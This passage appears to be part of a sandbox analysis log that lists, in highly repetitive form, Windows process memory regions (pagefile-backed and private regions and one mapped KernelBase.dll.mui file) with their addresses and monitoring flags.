"pagefile_0x0000000001ed0000" filename = "" Region: id = 2661 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2662 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2663 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2664 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2665 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2666 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2667 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2668 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2669 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2670 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2671 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2672 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2673 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2674 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2675 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2676 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2677 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2678 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2679 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2680 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2681 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2682 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2683 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2684 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2685 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2686 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2687 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2688 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2689 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2690 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2691 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2692 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2693 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2694 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2695 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2696 start_va = 0x1ed0000 end_va = 0x1ee9fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ed0000" filename = "" Region: id = 2697 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2698 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2699 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2700 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2701 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2702 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2703 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2704 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2705 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2706 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2707 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2708 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2709 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2710 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2711 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2712 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2713 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2714 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2715 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2716 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2717 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2718 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2719 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2720 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2721 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2722 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2723 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2724 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2725 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2726 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2727 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2728 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2729 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2730 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2731 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2732 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2733 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2734 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2735 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2736 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2737 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2738 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2739 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2740 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2741 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2742 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2743 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2744 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2745 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2746 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2747 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2748 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2749 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2750 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2751 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2752 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2753 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2754 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2755 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2756 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2757 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2758 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2759 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2760 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2761 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2762 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2763 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2764 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2765 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2766 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2767 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2768 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2769 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2770 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2771 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2772 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2773 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2774 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2775 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2776 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2777 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2778 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2779 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2780 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2781 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2782 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2783 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2784 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2785 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2786 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2787 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2788 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2789 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2790 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2791 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2792 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2793 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2794 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2795 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2796 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2797 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2798 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2799 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2800 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2801 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2802 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2803 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2804 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2805 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2806 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2807 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2808 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2809 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2810 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2811 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2812 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2813 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2814 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2815 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2816 start_va = 0x3230000 end_va = 0x32effff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "kernelbase.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\KernelBase.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\kernelbase.dll.mui") Region: id = 2817 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2818 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2819 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2820 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2821 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2822 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2823 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2824 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2825 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2826 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2827 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2828 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2829 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2830 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2831 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2832 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2833 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2834 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2835 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2836 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2837 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2838 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2839 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2840 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2841 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2842 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2843 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2844 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2845 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2846 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2847 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2848 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2849 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2850 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2851 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2852 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2853 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2854 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2855 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2856 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2857 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2858 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2859 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 2860 start_va = 0x2900000 end_va = 0x2925fff monitored = 1 